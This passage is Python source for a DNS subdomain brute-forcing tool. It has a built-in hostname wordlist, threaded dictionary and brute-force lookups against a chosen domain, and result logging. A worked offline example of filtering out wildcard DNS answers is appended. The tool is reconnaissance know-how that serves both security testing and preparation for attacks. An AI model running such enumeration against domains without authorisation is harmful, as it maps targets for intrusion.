'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures',
'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum',
'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop',
'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales',
'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15',
'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4',
'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press',
'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private',
'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo',
'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs',
'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen',
'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius',
'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver',
'recruiting', 'red', 'redhat', 'ref', 'reference', 'reg', 'register',
'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats',
'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho',
'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose',
'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1',
'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento',
'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego',
'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc',
'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle',
'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri',
'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services',
'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint',
'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si',
'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius',
'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc',
'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort',
'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source',
'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota',
'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk',
'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01',
'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv',
'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1',
'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock',
'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail',
'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1',
'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw',
'sw0', 'sw01', 'sw1', 'sweden', 'switch', 'switzerland', 'sy', 'sybase',
'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't',
'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team',
'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp',
'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k',
'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite',
'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta',
'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn',
'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour',
'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity',
'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u',
'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom',
'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads',
'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users',
'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault',
'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi',
'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual',
'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip',
'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz',
'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse',
'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard',
'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp',
'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring',
'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites',
'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends',
'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi',
'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2',
'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02',
'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate',
'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless',
'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad',
'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4',
'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-',
'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02',
'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x',
'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow',
'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm',
'zulu', 'zw' ]
 
 
def usage():
    print('\n' + USAGE)
    sys.exit()
 
 
def check_usage():
    if len(sys.argv) == 1:
        print('[!] WARNING: use -H for help and usage')
        sys.exit()
    return
 
 
def get_default_nameserver():
    print('[+] getting default nameserver')
    with open('/etc/resolv.conf', 'r') as f:
        lines = f.readlines()
    for line in lines:
        line = line.strip()
        if not line or line[0] == ';' or line[0] == '#':
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        if fields[0] == 'nameserver':
            defaults['nameserver'] = fields[1]
            return defaults
    # no nameserver line at all: the caller has to supply one with -d
    print('[!] WARNING: no nameserver in /etc/resolv.conf, use "-d" option')
    return defaults
 
 
def get_default_source_ip():
    print('[+] getting default ip address')
    try:
        # get currently used iface by establishing a temp UDP socket; no
        # packet is sent, but the name has to resolve
        ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        ipsocket.connect(("gmail.com", 80))
        defaults['ipaddr'] = ipsocket.getsockname()[0]
        print('[+] found currently used interface ip ' + "'" +
                defaults['ipaddr'] + "'")
        ipsocket.close()
    except socket.error:
        print('[!] WARNING: can\'t get your ip-address, use "-i" option and '
              'define yourself')
    return defaults
 
 
def parse_cmdline():
    p = argparse.ArgumentParser(usage=USAGE, add_help=False)
    p.add_argument(
            '-t',
            metavar='<type>',
            dest='type',
            help='attack type (0 for dictionary 1 for bruteforce)'
            )
    p.add_argument(
            '-a',
            metavar='<domain>',
            dest='domain',
            help='subdomain to bruteforce'
            )
    p.add_argument(
            '-l',
            metavar='<wordlist>',
            dest='wordlist',
            help='wordlist, one hostname per line (default: predefined in code)'
            )
    p.add_argument(
            '-d',
            metavar='<nameserver>',
            dest='dnshost',
            help="choose another nameserver (default: your system's)"
            )
    p.add_argument(
            '-i',
            metavar='<ipaddr>',
            dest='ipaddr',
            help="source ip address to use (default: your system's)"
            )
    p.add_argument(
            '-p',
            metavar='<port>',
            dest='port',
            default=0,
            help='source port to use (default: 0 --> first free random port)'
            )
    p.add_argument(
            '-u',
            metavar='<protocol>',
            dest='protocol',
            default='udp',
            help='speak via udp or tcp (default: udp)'
            )
    p.add_argument(
            '-c',
            metavar='<charset>',
            dest='charset',
            default=0,
            help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)'
            )
    p.add_argument(
            '-m',
            metavar='<maxchar>',
            dest='max',
            default=2,
            help='max chars to bruteforce (default: 2)'
            )
    p.add_argument(
            '-s',
            metavar='<prefix>',
            dest='prefix',
            help="prefix for bruteforce, e.g. 'www'"
            )
    p.add_argument(
            '-g',
            metavar='<postfix>',
            dest='postfix',
            help="postfix for bruteforce, e.g. 'www'"
            )
    p.add_argument(
            '-o',
            metavar='<sec>',
            dest='timeout',
            default=3,
            help='timeout (default: 3)'
            )
    p.add_argument(
            '-v',
            action='store_true',
            dest='verbose',
            help='verbose mode - prints every attempt (default: quiet)'
            )
    p.add_argument(
            '-w',
            metavar='<sec>',
            dest='wait',
            default=0,
            help='seconds to wait for next request (default: 0)'
            )
    p.add_argument(
            '-x',
            metavar='<num>',
            dest='threads',
            default=32,
            help='number of threads to use (default: 32) - choose more :)'
            )
    p.add_argument(
            '-r',
            metavar='<logfile>',
            dest='logfile',
            default='stdout',
            help='write found subdomains to file (default: stdout)'
            )
    p.add_argument(
            '-V',
            action='version',
            version='%(prog)s ' + VERSION,
            help='print version information'
            )
    p.add_argument(
            '-H',
            action='help',
            help='print this help'
            )
    return(p.parse_args())
 
 
def check_cmdline(opts):
    # attack type and target domain are mandatory; everything else has a default
    if not opts.type or not opts.domain:
        print('[-] ERROR: attack type and target domain are required (see -H)')
        sys.exit(1)
    return
 
 
def set_opts(defaults, opts):
    if not opts.dnshost:
        opts.dnshost = defaults['nameserver']
    if not opts.ipaddr:
        opts.ipaddr = defaults['ipaddr']
    if int(opts.charset) == 0:
        opts.charset = chars + digits
    elif int(opts.charset) == 1:
        opts.charset = chars
    else:
        opts.charset = digits
    if not opts.prefix:
        opts.prefix = prefix
    if not opts.postfix:
        opts.postfix = postfix
    return opts
 
 
def read_hostnames(opts):
    # returns the user's wordlist (one label per line, newlines stripped later)
    # or the predefined list from the top of the file
    print('[+] reading hostnames')
    if opts.wordlist:
        with open(opts.wordlist, 'r') as f:
            return f.readlines()
    return wordlist
 
 
def attack(opts, hostname, attack_pool):
    # Runs in a worker thread. The semaphore slot taken in run_threads() is
    # released in the 'finally' so that a timeout or socket error cannot leak
    # it; leaked slots would eventually block the main loop for good.
    if opts.verbose:
        sys.stdout.write('  -> trying %s\n' % hostname)
        sys.stdout.flush()
    try:
        x = dns.message.make_query(hostname, 'A')
        # keyword arguments: the positional order of these parameters is not
        # stable across dnspython releases
        if opts.protocol == 'udp':
            a = dns.query.udp(x, opts.dnshost, timeout=float(opts.timeout),
                    port=53, source=opts.ipaddr, source_port=int(opts.port),
                    ignore_unexpected=True)
        else:
            a = dns.query.tcp(x, opts.dnshost, timeout=float(opts.timeout),
                    port=53, source=opts.ipaddr, source_port=int(opts.port))
    except dns.exception.Timeout:
        # sys.exit() inside a worker only ends that thread; report and carry on
        print('[-] ERROR: time out for %s' % hostname)
        return
    except socket.error:
        print('[-] ERROR: no connection? ip|srcport incorrectly defined? you '
              'can run only one thread if fixed source port specified!')
        return
    finally:
        attack_pool.release()
    if a.answer:
        # the answer section may hold several rrsets; keep the first rdata of
        # each as text (for an A record that is the ip address)
        answ = ' '.join(str(rrset[0]) for rrset in a.answer)
        found.append((hostname, answ))
    return
 
 
def str_gen(opts, hostnames):
    # bruteforce mode ignores 'hostnames': candidates are every string of
    # length 1..opts.max over the chosen charset, as the -m help text promises
    print('[+] generating list of strings')
    return [''.join(t)
            for length in range(1, int(opts.max) + 1)
            for t in itertools.product(opts.charset, repeat=length)]
 
 
def run_threads(opts, hostname, attack_pool, threads):
    t = threading.Thread(target=attack, args=(opts, hostname, attack_pool))
    attack_pool.acquire()
    t.start()
    threads.append(t)
    return threads
 
 
def prepare_attack(opts, hostnames):
    sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain)
    threads = list()
    attack_pool = threading.BoundedSemaphore(value=int(opts.threads))
    if opts.type == '0':
        sys.stdout.write('dictionary\n')
        candidates = (h.rstrip() + '.' + opts.domain for h in hostnames)
    elif opts.type == '1':
        sys.stdout.write('bruteforce\n')
        candidates = (opts.prefix + h + opts.postfix + '.' + opts.domain
                      for h in str_gen(opts, hostnames))
    else:
        print('[-] ERROR: unknown attack type')
        sys.exit()
    for hostname in candidates:
        # optional delay between requests (-w), then hand the name to a worker
        time.sleep(float(opts.wait))
        threads = run_threads(opts, hostname, attack_pool, threads)
    for t in threads:
        t.join()
    return
 
 
def ip_extractor(ip):
    # pull the first dotted-quad out of the textual rrset answer;
    # note this only recognises IPv4, AAAA answers yield no match
    try:
        return re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)[0]
    except IndexError:
        print('[-] ERROR: can\'t extract ip addresses from %r' % ip)
        sys.exit()
 
 
def analyze_results(opts, found):
    # resolve the apex domain and keep every discovered host whose ip differs
    # from it; with a wildcard record every guess resolves to one address, so
    # hosts sharing the apex ip are the least interesting ones
    try:
        mainhostip = socket.gethostbyname(opts.domain)
    except socket.error:
        print('[-] ERROR: wrong domain or no connection?')
        sys.exit()
    for domain, ip in found:
        if ip_extractor(ip) != mainhostip:
            diffound.append(domain + ' | ' + ip)
    return
 
 
def log_results(opts, found, diffound):
    if opts.logfile == 'stdout':
        print('---')
        if not found:
            print('no hosts found :(')
        else:
            print('ANSWERED DNS REQUESTS')
            print('---')
            for f in found:
                print(f[0]+' | '+f[1])
        if not diffound:
            print('---')
            print('NO HOSTS WITH DIFFERENT IP FOUND :(')
        else:
            print('---')
            print('ANSWERED DNS REQUEST WITH DIFFERENT IP')
            print('---')
            for domain in diffound:
                print(domain)
    else:
        print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile)
        # the 'with' block closes the file, no explicit close() needed
        with open(opts.logfile, 'w') as f:
            if found:
                f.write('---\n')
                f.write('ANSWERED DNS REQUESTS\n')
                f.write('---\n')
                for x in found:
                    f.write('domain: ' + x[0] + ' | ' + x[1] + '\n')
            if not diffound:
                f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND :(\n')
            else:
                f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n')
                for domain in diffound:
                    f.write(domain + '\n')
    print('[+] game over')
    return
 
 
def main():
    check_usage()
    opts = parse_cmdline()
    check_cmdline(opts)
    # look up system defaults only for what the user did not supply; start
    # from an empty dict so set_opts() never sees an undefined 'defaults' and
    # a nameserver default is not overwritten by the source ip lookup
    # (assumes both helpers return a dict with the keys set_opts() reads)
    defaults = {}
    if not opts.dnshost:
        defaults.update(get_default_nameserver())
    if not opts.ipaddr:
        defaults.update(get_default_source_ip())
    if opts.protocol not in ('udp', 'tcp'):
        print('[-] ERROR: unknown protocol')
        sys.exit(1337)
    opts = set_opts(defaults, opts)
    hostnames = read_hostnames(opts)
    prepare_attack(opts, hostnames)
    analyze_results(opts, found)
    log_results(opts, found, diffound)
    return
 
 
if __name__ == '__main__':
    try:
        print(BANNER + '\n')
        main()
    except KeyboardInterrupt:
        print('\n[!] WARNING: aborted by user')
        raise SystemExit
 
# EOF
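The tool above decides whether a hit is interesting only by comparing its IPv4 address with the apex's (analyze_results), and ip_extractor's regex never sees AAAA answers. The check a practitioner wants before trusting bruteforce output against a zone with a wildcard record is shown in the following added example, which is not part of the tool: resolve a few random labels first, drop every hit whose address set is covered by that wildcard answer, and parse addresses with the ipaddress module so IPv6 records survive. The zone contents, the resolve() stand-in and the example.test names are constructed so the code runs offline; a real run would replace resolve() with actual queries.

```python
import ipaddress
import random
import string

# Constructed sample zone (not a real domain): name -> address records.
# The "*.example.test" entry models a wildcard record, which makes every
# unknown label under example.test resolve to 203.0.113.99.
ZONE = {
    "example.test":      ["203.0.113.10"],
    "www.example.test":  ["203.0.113.10"],
    "mail.example.test": ["203.0.113.25"],
    "dev.example.test":  ["198.51.100.7", "2001:db8::7"],
    "*.example.test":    ["203.0.113.99"],
}


def resolve(name, zone=ZONE):
    """Offline stand-in for an A/AAAA lookup: exact match first, then the
    closest wildcard, otherwise NXDOMAIN (empty list)."""
    if name in zone:
        return list(zone[name])
    labels = name.split(".")
    for i in range(1, len(labels)):
        wild = "*." + ".".join(labels[i:])
        if wild in zone:
            return list(zone[wild])
    return []


def normalise(addrs):
    """Validate and canonicalise addresses (v4 and v6, unlike an IPv4-only
    regex); raises ValueError on anything that is not an address."""
    return {str(ipaddress.ip_address(a)) for a in addrs}


def wildcard_ips(domain, probes=3, rng=None, zone=ZONE):
    """Resolve a few random, almost certainly non-existent labels; whatever
    they answer with is the zone's wildcard fingerprint."""
    rng = rng or random.Random(0)  # fixed seed keeps the example reproducible
    alphabet = string.ascii_lowercase + string.digits
    ips = set()
    for _ in range(probes):
        label = "".join(rng.choice(alphabet) for _ in range(12))
        ips |= normalise(resolve("%s.%s" % (label, domain), zone))
    return ips


def brute(domain, candidates, zone=ZONE):
    """Try each candidate label, discard wildcard noise and flag hosts whose
    address set differs from the apex. Returns (name, sorted ips, differs)."""
    apex = normalise(resolve(domain, zone))
    wild = wildcard_ips(domain, zone=zone)
    hits = []
    for label in candidates:
        name = "%s.%s" % (label, domain)
        ips = normalise(resolve(name, zone))
        if not ips:
            continue            # NXDOMAIN
        if wild and ips <= wild:
            continue            # indistinguishable from the wildcard answer
        hits.append((name, sorted(ips), ips != apex))
    return hits


if __name__ == "__main__":
    # "ftp" and "xyz" only resolve through the wildcard and are dropped
    for name, ips, differs in brute("example.test",
                                    ["www", "mail", "dev", "ftp", "xyz"]):
        print("%-20s %-30s %s" % (name, " ".join(ips),
                                  "differs from apex" if differs else "same as apex"))
```

A host that genuinely points at the wildcard address is invisible to this filter; that is the price of not reporting the whole dictionary as found. Running the probes before the bruteforce, rather than comparing against the apex afterwards, also catches zones whose wildcard and apex point to different addresses.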
